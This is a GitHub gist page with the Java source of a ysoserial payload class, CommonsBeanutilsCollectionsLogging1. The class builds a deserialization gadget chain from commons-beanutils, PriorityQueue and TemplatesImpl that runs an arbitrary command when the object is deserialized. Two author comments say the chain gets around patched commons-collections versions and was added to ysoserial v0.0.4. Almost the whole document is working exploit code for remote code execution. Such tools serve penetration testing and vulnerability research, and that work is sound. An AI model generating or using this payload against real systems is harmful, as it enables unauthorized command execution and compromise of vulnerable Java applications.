Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
commons beanutils gadget chain
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"})
public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
// mock method name until armed
final BeanComparator<Object> comparator = new BeanComparator<Object>("lowestSetBit");
// create queue with numbers and basic comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add(new BigInteger("1"));
queue.add(new BigInteger("1"));
// switch method called by comparator
Reflections.setFieldValue(comparator, "property", "outputProperties");
// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = templates;
queueArray[1] = templates;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args);
}
}
@frohoff
Copy link
Author

frohoff commented Feb 24, 2016

Note that while this requires commons-logging and commons-collections, the latter can be a version patched against the original CommonsCollections1 gadget chain.

@frohoff
Copy link
Author

frohoff commented Feb 24, 2016

Integrated into ysoserial v0.0.4

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment